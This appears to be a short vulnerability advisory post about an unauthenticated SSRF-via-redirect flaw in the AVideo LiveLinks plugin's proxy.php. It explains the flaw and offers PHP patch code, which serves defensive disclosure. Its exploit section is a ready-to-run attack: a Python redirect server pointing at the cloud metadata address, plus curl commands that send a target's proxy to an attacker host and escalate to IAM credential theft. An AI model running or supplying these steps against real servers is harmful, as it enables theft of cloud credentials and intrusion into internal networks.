Listen to this Post
The vulnerability exists in the LiveLinks plugin’s proxy.php endpoint, which validates user-supplied URLs using isSSRFSafeURL() but only checks the initial URL. When the initial URL responds with an HTTP 302 redirect, the Location header is extracted and passed directly to fakeBrowser() without re-validation. The fakeBrowser() function performs raw cURL fetches with no SSRF protections. This allows an attacker to chain an external redirect to internal services including cloud metadata endpoints (169.254.169.254), RFC1918 addresses, and localhost services. The endpoint is fully unauthenticated, requiring no session or database initialization. The attack results in two SSRF requests: get_headers() follows the redirect to internal IPs, then fakeBrowser() fetches the full response body containing sensitive data. Cloud metadata exposure can lead to IAM credential theft on AWS, GCP, and Azure deployments .
Platform: AVideo
Version: All
Vulnerability : SSRF via Redirect
Severity: Critical
date: Oct 17 2024
Prediction: Patch within 30-60 days
What Undercode Say:
Exploit:
Step 1: Attacker-controlled redirect server (Python)
cat > redirect_server.py << 'EOF'
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', 'http://169.254.169.254/latest/meta-data/')
self.end_headers()
HTTPServer(('0.0.0.0', 8080), RedirectHandler).serve_forever()
EOF
Start redirect server
python3 redirect_server.py &
Step 2: Exploit AVideo instance
curl -s "https://TARGET/plugin/LiveLinks/proxy.php?livelink=https://attacker.example:8080/"
Step 3: Escalate to IAM credential theft
curl -s "https://TARGET/plugin/LiveLinks/proxy.php?livelink=https://attacker.example:8080/iam-role"
Protection from this CVE:
// Option 1: Re-validate redirect target
$headers = get_headers($_GET['livelink'], 1, $context);
if (!empty($headers["Location"])) {
$_GET['livelink'] = $headers["Location"];
if (!isSSRFSafeURL($_GET['livelink'])) {
_error_log("LiveLinks proxy: SSRF blocked redirect: " . $_GET['livelink']);
echo "Access denied: Redirect targets restricted network";
exit;
}
}
// Option 2: Disable redirect following in get_headers()
$options = array(
'http' => array(
'follow_location' => 0,
'max_redirects' => 0,
)
);
$context = stream_context_create($options);
$headers = get_headers($_GET['livelink'], 1, $context);
Impact:
- Cloud metadata exposure (AWS/GCP/Azure IAM credentials)
- Internal network scanning (RFC1918 addresses)
- Localhost service data exfiltration
- No authentication required for exploitation
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

